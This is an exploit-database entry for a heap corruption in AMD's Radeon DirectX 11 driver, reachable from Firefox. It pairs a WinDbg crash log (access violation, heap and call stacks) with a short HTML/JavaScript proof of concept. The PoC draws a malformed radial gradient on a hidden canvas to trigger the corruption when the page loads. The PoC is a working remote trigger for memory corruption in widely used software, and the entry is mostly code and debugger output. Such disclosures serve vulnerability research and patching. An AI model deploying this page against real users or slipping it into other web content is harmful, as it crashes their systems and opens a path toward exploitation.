Advanced Micro Devices, Inc. Radeon DirectX 11 Driver (Firefox) Heap Corruption

2020.04.11
pl Marcin Ressel (PL) pl
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<html> <body> <script> /* Title : Advanced Micro Devices, Inc. Radeon DirectX 11 Driver (Firefox) Heap Corruption Date : 10.04.2020 Exploit Author : Marcin Ressel Vendor Homepage : https://www.amd.com/ Software Link: n/a Version: 8.17.10.0871 Tested on: Windows 10 home, AMD64 Family 23 Model 24 Stepping 1 AuthenticAMD ~2100 Mhz, Firefox 74.0 (64 bity) ---- 0:123> g (2560.1f28): Access violation - code c0000005 (!!! second chance !!!) atidxx64!AmdDxGsaFreeCompiledShader+0x45901d: 00007ffc`994cfecd 83bba000000013 cmp dword ptr [rbx+0A0h],13h ds:0000024a`5122f000=???????? 0:123> !heap -p -a @rbx address 0000024a5122ef60 found in _DPH_HEAP_ROOT @ 24a50701000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 24a653f10d0: 24a512270f0 7f10 - 24a51227000 9000 00007ffca7204847 ntdll!RtlDebugAllocateHeap+0x000000000000003f 00007ffca71b4a16 ntdll!RtlpAllocateHeap+0x0000000000077b26 00007ffca713babb ntdll!RtlpAllocateHeapInternal+0x00000000000001cb 00007ffc99378a05 atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000301b55 00007ffc996af263 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000006383b3 00007ffc996ae802 atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000637952 00007ffc993e9891 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000003729e1 00007ffc9917a7db atidxx64!AmdDxGsaFreeCompiledShader+0x000000000010392b 00007ffc9917949b atidxx64!AmdDxGsaFreeCompiledShader+0x00000000001025eb 00007ffc99169680 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000000f27d0 00007ffc99148e8a atidxx64!AmdDxGsaFreeCompiledShader+0x00000000000d1fda 00007ffc990951f4 atidxx64!AmdDxGsaFreeCompiledShader+0x000000000001e344 00007ffc998509ce atidxx64!AmdDxGsaFreeCompiledShader+0x00000000007d9b1e 00007ffc9984b950 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000007d4aa0 00007ffc99826a26 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000007afb76 00007ffc990aedcb atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000037f1b 00007ffc990ae6a9 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000000377f9 00007ffc99952114 atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0x00000000000a4654 00007ffca6747bd4 KERNEL32!BaseThreadInitThunk+0x0000000000000014 00007ffca716ced1 ntdll!RtlUserThreadStart+0x0000000000000021 0:123> kb # RetAddr : Args to Child : Call Site 00 00007ffc`994b4f3e : 0000024a`5122db98 0000024a`50dcef01 0000024a`5c27b600 0000024a`51228650 : atidxx64!AmdDxGsaFreeCompiledShader+0x45901d 01 00007ffc`99166094 : 0000024a`00000000 0000024a`00000000 0000024a`51211fc0 00000056`0743ec89 : atidxx64!AmdDxGsaFreeCompiledShader+0x43e08e 02 00007ffc`9917a1d3 : 0000024a`5122db80 0000024a`51211fc0 0000024a`0000002d 0000024a`51211fc0 : atidxx64!AmdDxGsaFreeCompiledShader+0xef1e4 03 00007ffc`99169680 : 0000024a`60901a50 0000024a`50e63108 00000000`00000002 0000024a`60901a50 : atidxx64!AmdDxGsaFreeCompiledShader+0x103323 04 00007ffc`99148e8a : 0000024a`60901a50 0000024a`50ddb1f0 0000024a`50dd6400 0000024a`60901a50 : atidxx64!AmdDxGsaFreeCompiledShader+0xf27d0 05 00007ffc`990951f4 : 00000000`00000001 0000024a`50dd6400 0000024a`50ddb1f0 0000024a`50ae0ec0 : atidxx64!AmdDxGsaFreeCompiledShader+0xd1fda 06 00007ffc`998509ce : 00000000`00000000 00000056`0743f5a0 0000024a`50dd6400 0000024a`5085c4c0 : atidxx64!AmdDxGsaFreeCompiledShader+0x1e344 07 00007ffc`9984b950 : 0000024a`00000000 0000024a`507d7d08 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7d9b1e 08 00007ffc`99826a26 : 00000000`00000000 00000000`00000000 0000024a`50cfafe0 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7d4aa0 09 00007ffc`990aedcb : 0000024a`50cfafe0 00000000`00000000 0000024a`5dc8ffd0 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7afb76 0a 00007ffc`990ae6a9 : 00000000`00000000 0000024a`57423fd0 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x37f1b 0b 00007ffc`99952114 : 0000024a`57423fd0 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x377f9 0c 00007ffc`a6747bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0xa4654 0d 00007ffc`a716ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14 0e 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21 */ var canvas=document.createElement("canvas"); canvas.width=200; canvas.height=200; canvas.style.display="none"; document.body.appendChild(canvas); var context = canvas.getContext("2d") function radioActiveGradient() { var ret = context.createRadialGradient(0.5681657437235117 * canvas.width, 0.6898449305444956 * canvas.height,0,0.46342297457158566 * canvas.width, 0.46342297457158566 * canvas.height,canvas.width * 2); ret.addColorStop(0,"rgb("+Math.floor(0.6898449305444956 * 355)+","+Math.floor(-1 * 255)+","+Math.floor(0.46342297457158566*255)+")"); return ret; } context.beginPath(), context.arc(0.5681657437235117 *canvas.width,0.6898449305444956*canvas.height,0.46342297457158566*canvas.width/5,0,2*Math.PI), context.fillStyle=radioActiveGradient(); context.fill(); context.lineWidth=2; context.strokeStyle=radioActiveGradient(); context.stroke() </script> </body> </html>


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top